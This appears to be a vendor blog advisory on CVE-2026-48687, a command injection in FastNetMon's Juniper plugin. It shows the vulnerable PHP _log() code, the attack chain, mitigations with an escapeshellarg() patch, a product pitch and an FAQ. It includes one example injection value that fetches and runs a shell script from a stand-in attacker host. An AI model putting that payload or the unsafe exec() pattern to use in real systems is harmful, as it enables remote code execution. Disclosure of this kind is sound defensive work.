| CVE ID | CVE-2026-48687 |
|---|---|
| CVSS Score | 8.1 HIGH |
| Vulnerability Type | CWE-78: OS Command Injection |
| Affected Software | FastNetMon Community Edition <= 1.2.9 |
| Component | src/juniper_plugin/fastnetmon_juniper.php, _log() function, lines 115-119 |
| Attack Vector | Indirect remote via DDoS attack notification pipeline |
| Impact | Remote code execution as FastNetMon process user (typically root) |
| Discovered By | Lorikeet Security (April 25, 2026) |
| Patch Status | No vendor fix as of May 23, 2026 |
| Related CVEs | CVE-2026-48695 (MikroTik plugin, same pattern), CVE-2026-48694 (Juniper NETCONF injection) |
This post is part of our FastNetMon CVE series covering all 16 vulnerabilities disclosed in 2026.
What Is CVE-2026-48687?
CVE-2026-48687 is an OS command injection vulnerability in FastNetMon Community Edition's Juniper plugin. The plugin's _log() function builds a shell command by concatenating unvalidated attack notification data directly into a string passed to PHP's exec(). When FastNetMon detects an attack and invokes the Juniper plugin, parameters like the attacker IP, attack direction, and attack power are interpolated into the logging command without any sanitization. An attacker who can influence these values can execute arbitrary commands on the host system.
The vulnerability was discovered by Lorikeet Security on April 25, 2026. As of May 23, 2026, no vendor fix has been released. CVSS is 8.1 (High), and the vulnerability class is CWE-78 (OS Command Injection).
Vulnerable Code
The vulnerability is in the _log() function at lines 115-119 of src/juniper_plugin/fastnetmon_juniper.php:
// fastnetmon_juniper.php, lines 115-119 function _log($msg) { global $FILE_LOG_TMP; exec("echo `date` \"- [FASTNETMON] - " . $msg . " \" >> " . $FILE_LOG_TMP); }
The $msg parameter is constructed from command-line arguments passed to the script by FastNetMon's notification system. These arguments include $IP_ATTACK, $DIRECTION_ATTACK, and $POWER_ATTACK, which correspond directly to the attack data that FastNetMon detected. None of these values are escaped or validated before being concatenated into the shell command.
This is a textbook CWE-78 violation. The exec() call treats the entire string as a shell command, which means shell metacharacters in any of the interpolated variables will be interpreted by the shell. Backticks, semicolons, pipes, and subshell syntax all execute as commands.
Attack Chain
The exploitation path is indirect but reliable. The attacker never connects to FastNetMon directly. Instead, they manipulate the data that flows through FastNetMon's detection pipeline:
- Attacker sends crafted traffic to a network monitored by FastNetMon. The traffic is designed to trigger a DDoS detection threshold.
- FastNetMon detects the attack and extracts parameters: the source IP, attack direction, and attack power.
- FastNetMon invokes the Juniper plugin as a notification script, passing the attack parameters as command-line arguments.
- The plugin calls
_log()with a message string that includes the raw attack parameters. - The
exec()call concatenates these values into a shell command. If any parameter contains shell metacharacters, they execute as commands.
For example, if the attacker can influence the source IP field to contain a value like 1.2.3.4$(curl attacker.com/shell.sh|sh), the subshell expression executes during the logging call. The command runs as the FastNetMon process user, which in most production deployments is root.
The attacker does not need network access to the FastNetMon host. They only need to send traffic that triggers detection. FastNetMon's own notification pipeline delivers the payload.
Am I Affected?
You are affected if all of the following are true:
- You run FastNetMon Community Edition version 1.2.9 or earlier
- The Juniper plugin (
fastnetmon_juniper.php) is configured as a notification script - FastNetMon runs with elevated privileges (root or a user with broad shell access)
If you use FastNetMon but have not enabled the Juniper plugin, this specific CVE does not apply. However, note that the same vulnerability pattern exists in the MikroTik plugin (CVE-2026-48695), and a separate NETCONF injection vulnerability exists in the same Juniper plugin file (CVE-2026-48694). Review the full list of 16 FastNetMon CVEs disclosed in 2026 to assess your exposure.
Mitigation and Remediation
There is no vendor patch as of May 23, 2026. Operators should apply one or more of the following mitigations:
1. Disable the Juniper Plugin
If the plugin is not essential to your workflow, remove it from FastNetMon's notification script configuration. This eliminates the attack surface entirely.
2. Escape All Interpolated Variables
Wrap every variable passed to exec() with escapeshellarg():
// Patched _log() function function _log($msg) { global $FILE_LOG_TMP; $safe_msg = escapeshellarg($msg); $safe_log = escapeshellarg($FILE_LOG_TMP); exec("echo $(date) - [FASTNETMON] - " . $safe_msg . " >> " . $safe_log); }
This prevents shell metacharacter interpretation in the concatenated values. Apply the same fix to all variables derived from command-line arguments throughout the script.
3. Restrict Script Permissions
Run FastNetMon's notification scripts under a dedicated, unprivileged user account rather than root. Use filesystem permissions to limit what the script can read, write, and execute. This does not fix the injection, but it constrains the blast radius of successful exploitation.
4. Audit Other Plugin Scripts
The _log() pattern is not unique to the Juniper plugin. Lorikeet Security found the same vulnerability in the MikroTik plugin (CVE-2026-48695). Audit any custom or community-contributed notification scripts in your deployment for similar exec(), system(), or shell_exec() calls that interpolate unsanitized input.
What This Means for Detection Tooling
CVE-2026-48687 illustrates a structural risk in detection tools that rely on shell-based plugin scripts to handle attack notifications. When a DDoS detection system passes attacker-controlled data through a shell pipeline, the detection system itself becomes the attack vector. The tool designed to protect the network becomes the entry point for compromise.
This is not a theoretical concern. FastNetMon's plugin architecture passes raw attack data as command-line arguments to user-provided scripts. Any script that calls exec(), system(), or backtick operators with those arguments inherits this class of vulnerability.
Flowtriq takes a different approach. The Flowtriq agent runs as a managed process with automatic updates, an authenticated control plane, and no shell-based plugin scripts. Notification and mitigation actions execute through structured APIs, not string-concatenated shell commands. The agent installs in roughly 60 seconds, runs at $9.99/node, and does not require operators to maintain or audit third-party PHP scripts.
DDoS detection that doesn't execute attacker-controlled input.
Free 14-day trial. No credit card required. Installs in 2 commands.
Frequently Asked Questions
What is CVE-2026-48687?
CVE-2026-48687 is an OS command injection vulnerability (CWE-78) in FastNetMon Community Edition's Juniper plugin. The _log() function in fastnetmon_juniper.php concatenates attacker-controlled attack data directly into a shell command without escaping. An attacker who triggers DDoS detection with crafted traffic can execute arbitrary shell commands on the FastNetMon host. CVSS score: 8.1 (High).
How is CVE-2026-48687 exploited?
An attacker sends traffic that triggers FastNetMon's DDoS detection. FastNetMon calls the Juniper plugin with attack parameters (IP, direction, power) as command-line arguments. The _log() function passes these values into an exec() call without sanitization. Shell metacharacters in the attack data (such as backticks or semicolons) execute arbitrary commands as the FastNetMon process user, which is typically root.
Is there a patch for CVE-2026-48687?
As of May 23, 2026, there is no vendor-issued fix for CVE-2026-48687. Operators should disable the Juniper plugin script, apply manual escaping with escapeshellarg() on all interpolated variables, or restrict the script's filesystem and execution permissions.
Does CVE-2026-48687 affect FastNetMon Advanced?
CVE-2026-48687 affects FastNetMon Community Edition version 1.2.9 and earlier. The Juniper plugin is a community-contributed PHP script. FastNetMon Advanced uses a different notification architecture, but operators should verify whether any custom scripts in their deployment follow the same unsafe pattern.
How is CVE-2026-48687 related to CVE-2026-48695?
CVE-2026-48695 is the same _log() command injection pattern in FastNetMon's MikroTik plugin (fastnetmon_mikrotik.php). Both vulnerabilities share an identical root cause: unescaped interpolation of attack parameters into exec() calls. CVE-2026-48687 affects the Juniper plugin, while CVE-2026-48695 affects the MikroTik plugin. A separate vulnerability in the same Juniper plugin file, CVE-2026-48694, covers NETCONF injection.